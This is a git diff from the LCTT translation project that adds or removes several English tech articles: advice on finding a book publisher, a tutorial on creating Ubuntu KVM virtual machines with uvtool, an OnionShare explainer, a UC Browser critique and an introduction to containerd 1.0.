Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably don't want to go with the traditional academic publisher.
|
||||
|
||||
Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop that publisher from your list. You can make some changes to your proposal to differentiate it from the existing book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes.
|
||||
|
||||
If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes publishers choose not to publish on specific technologies, either because they don't believe their audience is interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only way to know is to propose and find out.
|
||||
|
||||
### Work your network
|
||||
|
||||
Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still about _who_ you know, more than _what_ you know. The person you want to know is an _acquisitions editor,_ the editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject areas, particularly at larger publishers, but you don't need to find the right one yourself. They're usually happy to connect you with the correct person.
|
||||
|
||||
Sometimes you can find an acquisitions editor at a technical conference, especially one where the publisher is a sponsor, and has a booth. Even if there's not an acquisitions editor on site at the time, the staff at the booth can put you in touch with one. If conferences aren't your thing, you'll need to work your network to get an introduction. Use LinkedIn, or your informal contacts, to get in touch with an editor.
|
||||
|
||||
For smaller publishers, you may find acquisitions editors listed on the company website, with contact information if you're lucky. If not, search for the publisher's name on Twitter, and see if you can turn up their editors. You might be nervous about trying to reach out to a stranger over social media to show them your book, but don't worry about it. Making contact is what acquisitions editors do. The worst-case result is they ignore you.
|
||||
|
||||
Once you've made contact, the acquisitions editor will assist you with the next steps. They may have some feedback on your proposal right away, or they may want you to flesh it out according to their guidelines before they'll consider it. After you've put in the effort to find an acquisitions editor, listen to their advice. They know their system better than you do.
|
||||
|
||||
### If all else fails
|
||||
|
||||
If you can't find an acquisitions editor to contact, the publisher almost certainly has a blind proposal alias, usually of the form `proposals@[publisher].com`. Check the web site for instructions on what to send to a proposal alias; some publishers have specific requirements. Follow these instructions. If you don't, you have a good chance of your proposal getting thrown out before anybody looks at it. If you have questions, or aren't sure what the publisher wants, you'll need to try again to find an editor to talk to, because the proposal alias is not the place to get questions answered. Put together what they've asked for (which is a topic for a separate article), send it in, and hope for the best.
|
||||
|
||||
### And ... wait
|
||||
|
||||
No matter how you've gotten in touch with a publisher, you'll probably have to wait. If you submitted to the proposals alias, it's going to take a while before somebody does anything with that proposal, especially at a larger company. Even if you've found an acquisitions editor to work with, you're probably one of many prospects she's working with simultaneously, so you might not get rapid responses. Almost all publishers have a committee that decides on which proposals to accept, so even if your proposal is awesome and ready to go, you'll still need to wait for the committee to meet and discuss it. You might be waiting several weeks, or even a month before you hear anything.
|
||||
|
||||
After a couple of weeks, it's fine to check back in with the editor to see if they need any more information. You want to be polite in this e-mail; if they haven't answered because they're swamped with proposals, being pushy isn't going to get you to the front of the line. It's possible that some publishers will never respond at all instead of sending a rejection notice, but that's uncommon. There's not a lot to do at this point other than be patient. Of course, if it's been months and nobody's returning your e-mails, you're free to approach a different publisher or consider self-publishing.
|
||||
|
||||
### Good luck
|
||||
|
||||
If this process seems somewhat scattered and unscientific, you're right; it is. Getting published depends on being in the right place, at the right time, talking to the right person, and hoping they're in the right mood. You can't control all of those variables, but having a better knowledge of how the industry works, and what publishers are looking for, can help you optimize the ones you can control.
|
||||
|
||||
Finding a publisher is one step in a lengthy process. You need to refine your idea and create the proposal, as well as other considerations. At SeaGL this year [I presented][5] an introduction to the entire process. Check out [the video][6] for more detailed information.
|
||||
|
||||
### About the author
|
||||
|
||||
[![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7]
|
||||
|
||||
Brian MacDonald - Brian MacDonald is Managing Editor at the Pragmatic Bookshelf. Over the last 20 years in tech publishing, he's been an editor, author, and occasional speaker and trainer. He currently spends a lot of his time talking to new authors about how they can best present their ideas. You can follow him on Twitter at @bmac_editor.[More about me][2]
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/how-find-publisher-your-book
|
||||
|
||||
作者:[Brian MacDonald ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/bmacdonald
|
||||
[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s
|
||||
[2]:https://opensource.com/users/bmacdonald
|
||||
[3]:https://opensource.com/user/190176/feed
|
||||
[4]:https://pragprog.com/
|
||||
[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook
|
||||
[7]:https://opensource.com/users/bmacdonald
|
||||
[8]:https://opensource.com/users/bmacdonald
|
||||
[9]:https://opensource.com/users/bmacdonald
|
||||
[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments
|
@ -1,3 +1,4 @@
|
||||
translating by kimii
|
||||
Ubuntu 18.04 – New Features, Release Date & More
|
||||
============================================================
|
||||
|
||||
|
@ -0,0 +1,233 @@
|
||||
How to use KVM cloud images on Ubuntu Linux
|
||||
======
|
||||
|
||||
Kernel-based Virtual Machine (KVM) is a virtualization module for the Linux kernel that turns it into a hypervisor. You can create an Ubuntu cloud image with KVM from the command line using Ubuntu virtualisation front-end for libvirt and KVM.
|
||||
|
||||
How do I download and use a cloud image with kvm running on an Ubuntu Linux server? How do I create a virtual machine without the need of a complete installation on an Ubuntu Linux 16.04 LTS server? Kernel-based Virtual Machine (KVM) is a virtualization module for the Linux kernel that turns it into a hypervisor. You can create an Ubuntu cloud image with KVM from the command line using Ubuntu virtualisation front-end for libvirt and KVM.
|
||||
|
||||
This quick tutorial shows how to install and use uvtool, which provides a unified and integrated VM front-end to Ubuntu cloud image downloads, libvirt, and cloud-init.
|
||||
|
||||
### Step 1 - Install KVM
|
||||
|
||||
You must have kvm installed and configured. Use the [apt command][1]/[apt-get command][2] as follows:
|
||||
```
|
||||
$ sudo apt install qemu-kvm libvirt-bin virtinst bridge-utils cpu-checker
|
||||
$ kvm-ok
|
||||
## [configure bridged networking as described here][3]
|
||||
$ sudo vi /etc/network/interfaces
|
||||
$ sudo systemctl restart networking
|
||||
$ sudo brctl show
|
||||
```
|
||||
See "[How to install KVM on Ubuntu 16.04 LTS Headless Server][4]" for more info.
|
||||
|
||||
### Step 2 - Install uvtool
|
||||
|
||||
Type the following [apt command][1]/[apt-get command][2]:
|
||||
```
|
||||
$ sudo apt install uvtool
|
||||
```
|
||||
Sample outputs:
|
||||
```
|
||||
[sudo] password for vivek:
|
||||
Reading package lists... Done
|
||||
Building dependency tree
|
||||
Reading state information... Done
|
||||
The following packages were automatically installed and are no longer required:
|
||||
gksu libgksu2-0 libqt5designer5 libqt5help5 libqt5printsupport5 libqt5sql5 libqt5sql5-sqlite libqt5xml5 python3-dbus.mainloop.pyqt5 python3-notify2 python3-pyqt5 python3-sip
|
||||
Use 'sudo apt autoremove' to remove them.
|
||||
The following additional packages will be installed:
|
||||
cloud-image-utils distro-info python-boto python-pyinotify python-simplestreams socat ubuntu-cloudimage-keyring uvtool-libvirt
|
||||
Suggested packages:
|
||||
cloud-utils-euca shunit2 python-pyinotify-doc
|
||||
The following NEW packages will be installed:
|
||||
cloud-image-utils distro-info python-boto python-pyinotify python-simplestreams socat ubuntu-cloudimage-keyring uvtool uvtool-libvirt
|
||||
0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded.
|
||||
Need to get 1,211 kB of archives.
|
||||
After this operation, 6,876 kB of additional disk space will be used.
|
||||
Get:1 http://in.archive.ubuntu.com/ubuntu artful/main amd64 distro-info amd64 0.17 [20.3 kB]
|
||||
Get:2 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 python-boto all 2.44.0-1ubuntu2 [740 kB]
|
||||
Get:3 http://in.archive.ubuntu.com/ubuntu artful/main amd64 python-pyinotify all 0.9.6-1 [24.6 kB]
|
||||
Get:4 http://in.archive.ubuntu.com/ubuntu artful/main amd64 ubuntu-cloudimage-keyring all 2013.11.11 [4,504 B]
|
||||
Get:5 http://in.archive.ubuntu.com/ubuntu artful/main amd64 cloud-image-utils all 0.30-0ubuntu2 [17.2 kB]
|
||||
Get:6 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 python-simplestreams all 0.1.0~bzr450-0ubuntu1 [29.7 kB]
|
||||
Get:7 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 socat amd64 1.7.3.2-1 [342 kB]
|
||||
Get:8 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 uvtool all 0~git122-0ubuntu1 [6,498 B]
|
||||
Get:9 http://in.archive.ubuntu.com/ubuntu artful/universe amd64 uvtool-libvirt all 0~git122-0ubuntu1 [26.9 kB]
|
||||
Fetched 1,211 kB in 3s (393 kB/s)
|
||||
Selecting previously unselected package distro-info.
|
||||
(Reading database ... 199933 files and directories currently installed.)
|
||||
Preparing to unpack .../0-distro-info_0.17_amd64.deb ...
|
||||
Unpacking distro-info (0.17) ...
|
||||
Selecting previously unselected package python-boto.
|
||||
Preparing to unpack .../1-python-boto_2.44.0-1ubuntu2_all.deb ...
|
||||
Unpacking python-boto (2.44.0-1ubuntu2) ...
|
||||
Selecting previously unselected package python-pyinotify.
|
||||
Preparing to unpack .../2-python-pyinotify_0.9.6-1_all.deb ...
|
||||
Unpacking python-pyinotify (0.9.6-1) ...
|
||||
Selecting previously unselected package ubuntu-cloudimage-keyring.
|
||||
Preparing to unpack .../3-ubuntu-cloudimage-keyring_2013.11.11_all.deb ...
|
||||
Unpacking ubuntu-cloudimage-keyring (2013.11.11) ...
|
||||
Selecting previously unselected package cloud-image-utils.
|
||||
Preparing to unpack .../4-cloud-image-utils_0.30-0ubuntu2_all.deb ...
|
||||
Unpacking cloud-image-utils (0.30-0ubuntu2) ...
|
||||
Selecting previously unselected package python-simplestreams.
|
||||
Preparing to unpack .../5-python-simplestreams_0.1.0~bzr450-0ubuntu1_all.deb ...
|
||||
Unpacking python-simplestreams (0.1.0~bzr450-0ubuntu1) ...
|
||||
Selecting previously unselected package socat.
|
||||
Preparing to unpack .../6-socat_1.7.3.2-1_amd64.deb ...
|
||||
Unpacking socat (1.7.3.2-1) ...
|
||||
Selecting previously unselected package uvtool.
|
||||
Preparing to unpack .../7-uvtool_0~git122-0ubuntu1_all.deb ...
|
||||
Unpacking uvtool (0~git122-0ubuntu1) ...
|
||||
Selecting previously unselected package uvtool-libvirt.
|
||||
Preparing to unpack .../8-uvtool-libvirt_0~git122-0ubuntu1_all.deb ...
|
||||
Unpacking uvtool-libvirt (0~git122-0ubuntu1) ...
|
||||
Setting up distro-info (0.17) ...
|
||||
Setting up ubuntu-cloudimage-keyring (2013.11.11) ...
|
||||
Setting up cloud-image-utils (0.30-0ubuntu2) ...
|
||||
Setting up socat (1.7.3.2-1) ...
|
||||
Setting up python-pyinotify (0.9.6-1) ...
|
||||
Setting up python-boto (2.44.0-1ubuntu2) ...
|
||||
Setting up python-simplestreams (0.1.0~bzr450-0ubuntu1) ...
|
||||
Processing triggers for doc-base (0.10.7) ...
|
||||
Processing 1 added doc-base file...
|
||||
Setting up uvtool (0~git122-0ubuntu1) ...
|
||||
Processing triggers for man-db (2.7.6.1-2) ...
|
||||
Setting up uvtool-libvirt (0~git122-0ubuntu1) ...
|
||||
```
|
||||
|
||||
|
||||
### Step 3 - Download the Ubuntu Cloud image
|
||||
|
||||
You need to use the uvt-simplestreams-libvirt command. It maintains a libvirt volume storage pool as a local mirror of a subset of images available from a simplestreams source, such as Ubuntu cloud images. To update uvtool's libvirt volume storage pool with all current amd64 images, run:
|
||||
`$ uvt-simplestreams-libvirt sync arch=amd64`
|
||||
To just update/grab Ubuntu 16.04 LTS (xenial/amd64) image run:
|
||||
`$ uvt-simplestreams-libvirt --verbose sync release=xenial arch=amd64`
|
||||
Sample outputs:
|
||||
```
|
||||
Adding: com.ubuntu.cloud:server:16.04:amd64 20171121.1
|
||||
```
|
||||
|
||||
Pass the query option to query the local mirror:
|
||||
`$ uvt-simplestreams-libvirt query`
|
||||
Sample outputs:
|
||||
```
|
||||
release=xenial arch=amd64 label=release (20171121.1)
|
||||
```
|
||||
|
||||
Now, I have an image for Ubuntu xenial and I create the VM.
|
||||
|
||||
### Step 4 - Create the SSH keys
|
||||
|
||||
You need ssh keys for logging into KVM VMs. Use the ssh-keygen command to create a new one if you do not have any keys at all.
|
||||
`$ ssh-keygen`
|
||||
See "[How To Setup SSH Keys on a Linux / Unix System][5]" and "[Linux / UNIX: Generate SSH Keys][6]" for more info.
|
||||
|
||||
### Step 5 - Create the VM
|
||||
|
||||
It is time to create the VM named vm1 i.e. create an Ubuntu Linux 16.04 LTS VM:
|
||||
`$ uvt-kvm create vm1`
|
||||
By default, vm1 is created with the following characteristics:
|
||||
|
||||
1. RAM/memory : 512M
|
||||
2. Disk size: 8GiB
|
||||
3. CPU: 1 vCPU core
|
||||
|
||||
|
||||
|
||||
To control ram, disk, cpu, and other characteristics use the following syntax:
|
||||
`$ uvt-kvm create vm1 \
|
||||
--memory MEMORY \
|
||||
--cpu CPU \
|
||||
--disk DISK \
|
||||
--bridge BRIDGE \
|
||||
--ssh-public-key-file /path/to/your/SSH_PUBLIC_KEY_FILE \
|
||||
--packages PACKAGES1, PACKAGES2, .. \
|
||||
--run-script-once RUN_SCRIPT_ONCE \
|
||||
--password PASSWORD
|
||||
`
|
||||
Where,
|
||||
|
||||
1. **\--password PASSWORD** : Set the password for the ubuntu user and allow login using the ubuntu user (not recommended; use ssh keys instead).
|
||||
2. **\--run-script-once RUN_SCRIPT_ONCE** : Run RUN_SCRIPT_ONCE script as root on the VM the first time it is booted, but never again. Give full path here. This is useful to run custom task on VM such as setting up security or other stuff.
|
||||
3. **\--packages PACKAGES1, PACKAGES2, ..** : Install the comma-separated packages on first boot.
|
||||
|
||||
|
||||
|
||||
To get help, run:
|
||||
```
|
||||
$ uvt-kvm -h
|
||||
$ uvt-kvm create -h
|
||||
```
|
||||
|
||||
#### How do I delete my VM?
|
||||
|
||||
To destroy/delete your VM named vm1, run (please use the following command with care as there would be no confirmation box):
|
||||
`$ uvt-kvm destroy vm1`
|
||||
|
||||
#### To find out the IP address of the vm1, run:
|
||||
|
||||
`$ uvt-kvm ip vm1`
|
||||
192.168.122.52
|
||||
|
||||
#### To list all VMs run
|
||||
|
||||
`$ uvt-kvm list`
|
||||
Sample outputs:
|
||||
```
|
||||
vm1
|
||||
freebsd11.1
|
||||
|
||||
```
|
||||
|
||||
### Step 6 - How to login to the vm named vm1
|
||||
|
||||
The syntax is:
|
||||
`$ uvt-kvm ssh vm1`
|
||||
Sample outputs:
|
||||
```
|
||||
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
|
||||
|
||||
 * Documentation:  https://help.ubuntu.com
|
||||
 * Management:     https://landscape.canonical.com
|
||||
 * Support:        https://ubuntu.com/advantage
|
||||
|
||||
Get cloud support with Ubuntu Advantage Cloud Guest:
|
||||
http://www.ubuntu.com/business/services/cloud
|
||||
|
||||
0 packages can be updated.
|
||||
0 updates are security updates.
|
||||
|
||||
|
||||
Last login: Thu Dec 7 09:55:06 2017 from 192.168.122.1
|
||||
|
||||
```
|
||||
|
||||
Another option is to use the regular ssh command from macOS/Linux/Unix/Windows client:
|
||||
`$ ssh [[email protected]][7]
|
||||
$ ssh -i ~/.ssh/id_rsa [[email protected]][7]`
|
||||
Sample outputs:
|
||||
[![Connect to the running VM using ssh][8]][8]
|
||||
Once the VM is created you can use the virsh command as usual:
|
||||
`$ virsh list`
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/how-to-use-kvm-cloud-images-on-ubuntu-linux/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
|
||||
[2]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
|
||||
[3]:https://www.cyberciti.biz/faq/how-to-create-bridge-interface-ubuntu-linux/
|
||||
[4]:https://www.cyberciti.biz/faq/installing-kvm-on-ubuntu-16-04-lts-server/
|
||||
[5]:https://www.cyberciti.biz/faq/how-to-set-up-ssh-keys-on-linux-unix/
|
||||
[6]:https://www.cyberciti.biz/faq/linux-unix-generating-ssh-keys/
|
||||
[7]:https://www.cyberciti.biz/cdn-cgi/l/email-protection
|
||||
[8]:https://www.cyberciti.biz/media/new/faq/2017/12/connect-to-the-running-VM-using-ssh.jpg
|
@ -1,79 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
OnionShare - Share Files Anonymously
|
||||
======
|
||||
In this Digital World, we share our media, documents, important files via the Internet using different cloud storage like Dropbox, Mega, Google Drive and many more. But every cloud storage comes with two major problems, one is the Size and the other Security. After getting used to Bit Torrent the size is not a matter anymore, but the security is.
|
||||
|
||||
Even though you send your files through the secure cloud services they will be noted by the company, if the files are confidential, even the government can have them. So to overcome these problems we use OnionShare, as per the name it uses the Onion internet i.e Tor to share files Anonymously to anyone.
|
||||
|
||||
### How to Use **OnionShare**?
|
||||
|
||||
* First Download the [OnionShare][1] and [Tor Browser][2]. After downloading install both of them.
|
||||
|
||||
|
||||
|
||||
[![install onionshare and tor browser][3]][3]
|
||||
|
||||
* Now open OnionShare from the start menu
|
||||
|
||||
|
||||
|
||||
[![onionshare share files anonymously][4]][4]
|
||||
|
||||
* Click on Add and add a File/Folder to share.
|
||||
* Click start sharing. It produces a .onion URL, you could share the URL with your recipient.
|
||||
|
||||
|
||||
|
||||
[![share file with onionshare anonymously][5]][5]
|
||||
|
||||
* To Download file from the URL, copy the URL and open Tor Browser and paste it. Open the URL and download the Files/Folder.
|
||||
|
||||
|
||||
|
||||
[![receive file with onionshare anonymously][6]][6]
|
||||
|
||||
### Start of **OnionShare**
|
||||
|
||||
A few years back, Glenn Greenwald found that some of the NSA documents he had received from Edward Snowden were corrupted. He still needed the documents, so he decided to transfer the files using a USB drive, but it was not successful.
|
||||
|
||||
After reading the book written by Greenwald, Micah Lee crypto expert at The Intercept, released the OnionShare - simple, free software to share files anonymously and securely. He created the program to share big data dumps via a direct channel encrypted and protected by the anonymity software Tor, making it hard to get the files for the eavesdroppers.
|
||||
|
||||
### How Does **OnionShare** Work?
|
||||
|
||||
OnionShare starts a web server at 127.0.0.1 on a random port to share the file. It picks two random words, called the slug, from a wordlist of 6800 words. It then makes the server available as a Tor onion service to send the file. The final URL looks like this:
|
||||
|
||||
`http://qx2d7lctsnqwfdxh.onion/subside-durable`
|
||||
|
||||
OnionShare shuts down after the download completes, which makes the file unavailable on the internet from then on. There is also an option to allow the files to be downloaded multiple times.
|
||||
|
||||
### Advantages of using **OnionShare**
|
||||
|
||||
No other websites or applications have access to your files: The file the sender shares using OnionShare is not stored on any server. It is directly hosted on the sender's system.
|
||||
|
||||
No one can spy on the shared files: The connection between the users is encrypted by the Onion service and Tor Browser. This makes the connection secure and makes it hard for eavesdroppers to get the files.
|
||||
|
||||
Both users are Anonymous: OnionShare and Tor Browser make both sender and recipient anonymous.
|
||||
|
||||
### Conclusion
|
||||
|
||||
In this article, I have explained how to **share your documents, files anonymously**. I also explained how it works. Hope you have understood how OnionShare works, and if you still have a doubt regarding anything, just drop in a comment.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/onionshare-share-files-anonymously-2
|
||||
|
||||
作者:[Anirudh Rayapeddi][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com
|
||||
[1]:https://onionshare.org/
|
||||
[2]:https://www.torproject.org/projects/torbrowser.html.en
|
||||
[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/Icons.png
|
||||
[4]:http://www.theitstuff.com/wp-content/uploads/2017/12/Onion-Share.png
|
||||
[5]:http://www.theitstuff.com/wp-content/uploads/2017/12/With-Link.png
|
||||
[6]:http://www.theitstuff.com/wp-content/uploads/2017/12/Tor.png
|
@ -1,95 +0,0 @@
|
||||
translating---geekpi
|
||||
|
||||
The Biggest Problems With UC Browser
|
||||
======
|
||||
Before we even begin talking about the cons, I want to establish the fact that
|
||||
I have been a devoted UC Browser user for the past 3 years. I really love the
|
||||
download speeds I get, the ultra-sleek user interface and eye-catching icons
|
||||
used for tools. I was a Chrome for Android user in the beginning but I
|
||||
migrated to UC on a friend's recommendation. But in the past 1 year or so, I
|
||||
have seen some changes that have made me rethink about my choice and now I
|
||||
feel like migrating back to chrome again.
|
||||
|
||||
### The Unwanted **Notifications**
|
||||
|
||||
I am sure I am not the only one who gets these unwanted notifications every
|
||||
few hours. These clickbait articles are a real pain and the worst part is that
|
||||
you get them every few hours.
|
||||
|
||||
[![uc browser's annoying ads notifications][1]][1]
|
||||
|
||||
I tried closing them down from the notification settings but they still kept
|
||||
appearing, albeit with less frequency.
|
||||
|
||||
### The **News Homepage**
|
||||
|
||||
Another unwanted section that is completely useless. We completely understand
|
||||
that UC browser is free to download and it may require funding but this is not
|
||||
the way to do it. The homepage features news articles that are extremely
|
||||
distracting and unwanted. Sometimes when you are in a professional or family
|
||||
environment some of these click baits might even cause awkwardness.
|
||||
|
||||
[![uc browser's embarrassing news homepage][2]][2]
|
||||
|
||||
And they even have a setting for that. To Turn the **UC** **News Display ON /
|
||||
OFF.** And guess what, I tried that too. In the image below, you can see
|
||||
my efforts on the left-hand side and the output on the right-hand side.[![uc
|
||||
browser homepage settings][3]][3]
|
||||
|
||||
And click bait news isn't enough, they have started adding some unnecessary
|
||||
features. So let's include them as well.
|
||||
|
||||
### UC **Music**
|
||||
|
||||
UC browser integrated a **music player** in their browser to play music. It's
|
||||
just something that works, nothing too fancy. So why even have it? What's the
|
||||
point? Who needs a music player in their browsers?
|
||||
|
||||
[![uc browser adds uc music player][4]][4]
|
||||
|
||||
It's not even like it will play audio from the web directly via that player in
|
||||
the background. Instead, it is a music player that plays offline music. So why
|
||||
have it? I mean it is not even good enough to be used as a primary music
|
||||
player. Even if it was, it doesn't run independently of UC Browser. So why
|
||||
would someone have his/her browser running just to use your Music Player?
|
||||
|
||||
### The **Quick** Access Bar
|
||||
|
||||
I have seen 9 out of 10 average users have this bar hanging around in their
|
||||
notification area because it comes default with the installation and they
|
||||
don't know how to get rid of it. The settings on the right get the job done.
|
||||
|
||||
[![uc browser annoying quick access bar][5]][5]
|
||||
|
||||
But I still wanna ask, "Why does it come by default ?". It's a headache for
|
||||
most users. If we want it we will enable it. Why force it on users, though?
|
||||
|
||||
### Conclusion
|
||||
|
||||
UC browser is still one of the top players in the game. It provides one of the
|
||||
best experiences, however, I am not sure what UC is trying to prove by packing
|
||||
more and more unwanted features in their browser and forcing the user to use
|
||||
them.
|
||||
|
||||
I have loved UC for its speed and design. But recent experiences have led to
|
||||
me having a second thought about my primary browser.
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.theitstuff.com/biggest-problems-uc-browser
|
||||
|
||||
作者:[Rishabh Kandari][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.theitstuff.com/author/reevkandari
|
||||
[1]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-6.png
|
||||
[2]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-1-1.png
|
||||
[3]:http://www.theitstuff.com/wp-content/uploads/2017/12/uceffort.png
|
||||
[4]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-3-1.png
|
||||
[5]:http://www.theitstuff.com/wp-content/uploads/2017/10/Untitled-design-4-1.png
|
||||
|
50
sources/tech/20171211 A tour of containerd 1.0.md
Normal file
50
sources/tech/20171211 A tour of containerd 1.0.md
Normal file
@ -0,0 +1,50 @@
|
||||
A tour of containerd 1.0
|
||||
======
|
||||
XiaochenCui translating
|
||||
|
||||
![containerd][1]
|
||||
|
||||
We have done a few talks in the past on different features of containerd, how it was designed, and some of the problems that we have fixed along the way. Containerd is used by Docker, Kubernetes CRI, and a few other projects but this is a post for people who may not know what containerd actually does within these platforms. I would like to do more posts on the feature set and design of containerd in the future but for now, we will start with the basics.
|
||||
|
||||
I think the container ecosystem can be confusing at times. Especially with the terminology that we use. What's this? A runtime. And this? A runtime… containerd (pronounced " _container-dee "_) as the name implies, not contain nerd as some would like to troll me with, is a container daemon. It was originally built as an integration point for OCI runtimes like runc but over the past six months it has added a lot of functionality to bring it up to par with the needs of modern container platforms like Docker and orchestration systems like Kubernetes.
|
||||
|
||||
So what do you actually get using containerd? You get push and pull functionality as well as image management. You get container lifecycle APIs to create, execute, and manage containers and their tasks. An entire API dedicated to snapshot management and an openly governed project to depend on. Basically everything that you need to build a container platform without having to deal with the underlying OS details. I think the most important part of containerd is having a versioned and stable API that will have bug fixes and security patches backported.
|
||||
|
||||
![containerd][2]
|
||||
|
||||
Since there is no such thing as Linux containers in the kernel, containers are various kernel features tied together, when you are building a large platform or distributed system you want an abstraction layer between your management code and the syscalls and duct tape of features to run a container. That is where containerd lives. It provides a client a layer of stable types that platforms can build on top of without ever having to drop down to the kernel level. It's so much nicer to work with Container, Task, and Snapshot types than it is to manage calls to clone() or mount(). Balanced with the flexibility to directly interact with the runtime or host-machine, these objects avoid the sacrifice of capabilities that typically come with higher-level abstractions. The result is that easy tasks are simple to complete and hard tasks are possible.
|
||||
|
||||
![containerd][3]Containerd was designed to be used by Docker and Kubernetes as well as any other container system that wants to abstract away syscalls or OS specific functionality to run containers on Linux, Windows, Solaris, or other Operating Systems. With these users in mind, we wanted to make sure that containerd has only what they need and nothing that they don't. Realistically this is impossible but at least that is what we try for. While networking is out of scope for containerd, what it doesn't do lets higher level systems have full control. The reason for this is, when you are building a distributed system, networking is a very central aspect. With SDN and service discovery today, networking is way more platform specific than abstracting away netlink calls on linux. Most of the new overlay networks are route based and require routing tables to be updated each time a new container is created or deleted. Service discovery, DNS, etc all have to be notified of these changes as well. It would be a large chunk of code to be able to support all the different network interfaces, hooks, and integration points to support this if we added networking to containerd. What we did instead is opted for a robust events system inside containerd so that multiple consumers can subscribe to the events that they care about. We also expose a [Task API ][4]that lets users create a running task, have the ability to add interfaces to the network namespace of the container, and then start the container's process without the need for complex hooks in various points of a container's lifecycle.
|
||||
|
||||
Another area that has been added to containerd over the past few months is a complete storage and distribution system that supports both OCI and Docker image formats. You have a complete content addressed storage system across the containerd API that works not only for images but also metadata, checkpoints, and arbitrary data attached to containers.
|
||||
|
||||
We also took the time to [rethink how "graphdrivers" work][5]. These are the overlay or block level filesystems that allow images to have layers and you to perform efficient builds. Graphdrivers were initially written by Solomon and I when we added support for devicemapper. Docker only supported AUFS at the time so we modeled the graphdrivers after the overlay filesystem. However, making a block level filesystem such as devicemapper/lvm act like an overlay filesystem proved to be much harder to do in the long run. The interfaces had to expand over time to support different features than what we originally thought would be needed. With containerd, we took a different approach, make overlay filesystems act like a snapshotter instead of vice versa. This was much easier to do as overlay filesystems provide much more flexibility than snapshotting filesystems like BTRFS, ZFS, and devicemapper as they don't have a strict parent/child relationship. This helped us build out [a smaller interface for the snapshotters][6] while still fulfilling the requirements needed from things [like a builder][7] as well as reduce the amount of code needed, making it much easier to maintain in the long run.
|
||||
|
||||
![][8]
|
||||
|
||||
You can find more details about the architecture of containerd in [Stephen Day's Dec 7th 2017 KubeCon SIG Node presentation][9].
|
||||
|
||||
In addition to the technical and design changes in the 1.0 codebase, we also switched the containerd [governance model from the long standing BDFL to a Technical Steering Committee][10] giving the community an independent third party resource to rely on.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://blog.docker.com/2017/12/containerd-ga-features-2/
|
||||
|
||||
作者:[Michael Crosby][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://blog.docker.com/author/michael/
|
||||
[1]:https://i0.wp.com/blog.docker.com/wp-content/uploads/950cf948-7c08-4df6-afd9-cc9bc417cabe-6.jpg?resize=400%2C120&ssl=1
|
||||
